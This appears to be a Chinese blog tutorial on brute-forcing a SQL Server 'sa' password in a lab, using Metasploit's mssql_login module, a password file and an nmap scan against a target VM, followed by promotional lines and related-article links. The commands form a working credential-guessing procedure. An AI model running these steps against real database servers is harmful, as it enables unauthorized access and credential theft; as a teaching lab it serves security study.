白帽***教你Kali Linux:数据库密码脆弱性***演练中
一、课前声明
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.搭建好Sql server的靶机一个;
3.整装待发的小白一个。
三、战略安排
3.1 以静默方式进入Metasploit(msf)***框架,如下图所示。
命令:msfconsole -q
3.2 检索暴力破解Mysql服务的漏洞利用模块,如下图所示。
命令:search mssql_login
3.3 利用检索到的漏洞利用模块,如下图所示。
命令:use auxiliary/scanner/mssql/mssql_login
3.4
4a0c
查看漏洞利用模块的参数,如下图所示。
命令:show options
3.5 设置参数,如下图所示。
3.5.1 命令:set username sa
3.5.2 设置密码文件,如下图所示。
命令:set pass_file 路径
例子:set pass_file /root/passwd.txt
3.5.3 设置***线程,如下图所示。
命令:set threads 5
3.5.4 查看目标主机的IP地址
命令:ipconfig
3.5.5 设置目标主机的IP,如下图所示。
命令:set rhosts 192.168.0.102
3.6 在Kali***者主机新建终端利用“nmap”工具对目标主机进行扫描,如下图所示。
命令:nmap -sV 192.168.0.102
3.7 设置目标主机***端口,如下图所示。
命令:set rport 49156
3.8 运行***模式,如下图所示。
命令:run
如下图所示,绿色代码表示爆破成功。
小编一个个字敲打创作,可辛苦了,问君可否关注一下呢?你还可搜索:Kali与编程,学习更多呢 !
点我学习更多Kali Linux***测试与网络***实战技巧!
- Postgres数据库忘记密码,三个步骤解决(windows下)
- 数据库链接错误,有可能不是用户名密码的问题
- MySQL数据库总结(3)数据库的备份与恢复与破解密码,DCL用户权限查
- 水晶报表项目运行时 去掉 输入连接数据库密码 的页面
- 在数据库连接名跟密码还有数据库名字也正确的时候报错com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Access denied fo
- Mysql登录中文名称+密码不成功,原因是数据库编码不是utf8
- druid对数据库连接密码加密和解密
- Kali Linux下破解WIFI密码挂载usb无线网卡的方法
- 数据库 之 更改用户密码和忘记管理员密码解决方法
- linux 修改数据库密码
- Linux系统下数据库Mariadb(下)数据的备份和恢复,密码更改和破解,数据库的网页操作
- 使用MD5对存放在数据库中用户密码进行保护
- druid配置数据库连接使用密文密码
- Android数据库加解密逆向分析(三)——微信数据库密码破解
- 数据库密码过期,账号被锁解决方法
- springbootMaven项目Druid数据库密码加密
- mysql中名字为mysql的数据库的user表,可以存储用户信息,以及ip地址等,可以用来重设密码,禁止或允许用户远程访问等
- 织梦后台密码忘记的解决方法-修改数据库表
- 数据库知识杂记:mysql 忘记root密码
- Kali Linux 2020.1修改Root用户密码--操作简单